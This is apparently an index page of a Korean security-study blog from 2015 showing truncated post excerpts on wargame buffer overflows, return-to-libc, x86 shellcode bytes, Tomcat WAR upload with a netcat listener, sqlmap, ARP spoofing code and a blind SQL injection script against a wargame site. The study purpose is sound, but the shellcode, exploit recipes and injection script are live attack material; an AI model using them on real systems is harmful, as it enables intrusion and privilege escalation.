Lucete291

• 

  LOB gate LOB gate로 접속을 하면 gate와 gate로 접속가능하다. 접속후 확인 하면 파일이 3개있는 것이 확인가능 하다 먼저 cp 명령을 이용하여 gremlin의 권한이 없어 gdb 도 못하는 문제를 해결하자 !cp명령어는 파일을 복사하는 명령어이다. 파일을 복사하고 gremlin.c 를 열어보면 strcpy에서 문제가 발생하는 것을 볼수 있다.페이로드를 생각 해보면 일단 buffer 260(256+sfp)+shellcode+ret주소(buffer주소)를 넣어야한다. gdb로 확인을 해보면 strcpy다음에서 일어나니 b *main+59에 브레이크 포인트를 걸고 r $(python -c 'print "\x90"*200(임의의 값)')을 넣고 x/100x $esp 로 esp값을 확인 하면 0x9090909.. Wargame/CTF(Capture The Flag) 2015. 9. 14.

• system 2 gdb안에서의 blocking 함수 입력 r Security Study/System 2015. 9. 13.

• system 1일차 buf[248] + sfp[4] + ret ulimit -s unlimited //스택크기를 무한정으로 늘려 ASLR이 적용안됨 system,execve - ebp+8위치에있는것을 인자로받음 buf[248] + sfp [4] + 조작(system) + AAAA + /bin/sh - system("/bin/sh") b main r 1 p system - system주소 구하기 p exit - exit구하기 find &system,+9999999,"/bin/sh" - /bin/sh주소 구하기 ./filename $(python -c 'print "A"*버퍼+sfp + system + exit + /bin/sh strcpy(bss,\x80asda) strcpy(bss,"b") ./filename buf+sfp.. Security Study/System 2015. 9. 12.

• 모의해킹이란 무엇인가? 저자와의 만남 title : 최산 동향 파악을 통한 공격기법 이해 ---------------------------------------------------------------------------------------------- 최신 취약점 미패치?os, 어플리케이션 등에서 발견되고 있는 취약점을 주기적을 패치하지 않음으로써, 시스템 및 개인 PC에 심각한 영향을 줄수 있는 취약점 모의 해킹을 하다보면 web에 중점을 둘수 밖에 없다. 1) 취약점 공격사례1-1)tomcat관리자 페이지 취약점 (8180 metasplotable) => 추측 공격(모든답은 page안에)war file -> jar cvf test.war .file upload 취약점 upload하고 커맨드 창을 연다.nc -lvp 12345 를 .. My Story 2015. 9. 11.

• windows 10 (microsoft) 과거 - 사람이 컴퓨터있는 곳으로 찾아다님현재 - 사람으로 부터 가장 가까이 있는 장치로 인하여 사용하고 꺼버림(소비하는 개념) windows 7 - 마우스와 키보드에 적응하여 windows 8이 나왔을 때 적응하기가 힘듬windows 8 - start button, shutdown button 두가지의 문제점이 발생 windows 10 - 두가지의 문제점을 한번에 해결windows 10 - 10부터는 computer 뿐만아니라 phone에서도 사용 가능(앱 호환) windows 10 - music, camera, media, mail, edge(internet browser)windows 10 - mobility, more personal, more productivity, one more thing .. My Story 2015. 9. 10.

• 여러가지 코딩사이트 http://www.tutorialspoint.com/codingground.htm My Story 2015. 9. 10.

• system shellcode // 16 Byte, setreuid( geteuid() , geteuid() );\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80 // 25 Byte, shellcode\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 // 41 Byte\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0.. Security Study/System 2015. 9. 10.

• sqlmap SQLMAP 감지 및 SQL 주입 취약점을 이용하여 데이터베이스 서버의 인계 과정을 자동화하는 오픈 소스 침입 테스트 도구입니다. ,이것은 데이터베이스에서 기본 파일 시스템에 액세스하고 밖을 통해 운영 체제에서 명령을 실행하는 페치 데이터에 궁극적 인 침입 테스터 및 데이터베이스 지문에서 지속 스위치의 넓은 ,범위에 대한 많은 틈새 기능,​​ 강력한 검색 엔진이 포함되어 있습니다 . root@kali:~# sqlmap = automatic SQL injection tool 도움말 root@kali:~# sqlmap -h Usage: python sqlmap [options] Options: -h, --help Show basic help message and exit -hh Show advanced he.. Metasploit/Kali & Backtrack 2015. 9. 9.

• 

  범용 레지스터(General Register) 범용 레지스터(General Register)EAX (AX, AH, AL) - 누적연산기, 곱셈과 나눗셈 연산에서 자동으로 사용EBX (BX, BH, BL) - 베이스 레지스터, 특정 주소를 지정ECX (CX, CH, CL) - 수를 세아림, 자동으로 루프 카운터됨(반복적인 명령을 수행시)EDX (DX, DHT, DL) - 데이터 레지스터, 입출력 연산에서 반드시 간접 주소 지정에 사용ESI (SI) - 읽기 인덱스, 문자열 전송이나 비교에서 사용되는데 주로 소스 문자열의 오프셋을 가리킴EDI (DI) - 쓰기 인덱스 EBP (BP) - 베이스 포인터, 스택의 데이터에 접근하기 위해 사용ESP (SP) - 스택 포인터, 현재까지 사용된 스택의 위치를 저장, 스택 최상부의 오프셋을 가리킴EIP - 명령어 .. Security Study/Reversing 2015. 9. 8.

• arp spoofing.c 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. #include "Arp.h" int main(int argc, char **argv) { pcap_if_t *alldevs; pcap_if_t *d; int inum; pcap_t *adhandle; char packet_filter[] = ""; struct bpf_program fcode; u_int netmask; pcap_t *fp; char errbuf[PCAP_ERRBUF_SIZE]; int .. Language 2015. 9. 8.

• Mac Capture.c #define WPCAP #define HAVE_REMOTE #include "pcap.h" #include #include typedef struct arphdr { u_char DMac[6]; // target hardware address u_char SMac[6]; // sender hardware address u_int16_t type; // operation code u_char ver_ihl; // Version (4 bits) + Internet header length (4 bits) u_char tos; // Type of service u_short tlen; // Total length u_short identification; // I.. Language 2015. 9. 8.

• blind sql injection.py #http2,1)%3C%27N%27)--+&pw=adminimport urllibimport urllib2 ans =""ans2="" for i in range(1,11): for j in range(33,127) : url1 = "http://suninatas.com/Part_one/web22/web22.asp?id=admin'+and(substring(pw," url1=url1+str(i)+",1)='" url1=url1+chr(j)+"')--+&pw=1" try: #print url1; req = urllib2.Request(url1) req.add_header('cookie',"ASPSESSIONIDSSATDDSQ=EMNOHBMDIHNLAAFFOHICOODE") res = urllib2.urlop.. Language 2015. 9. 8.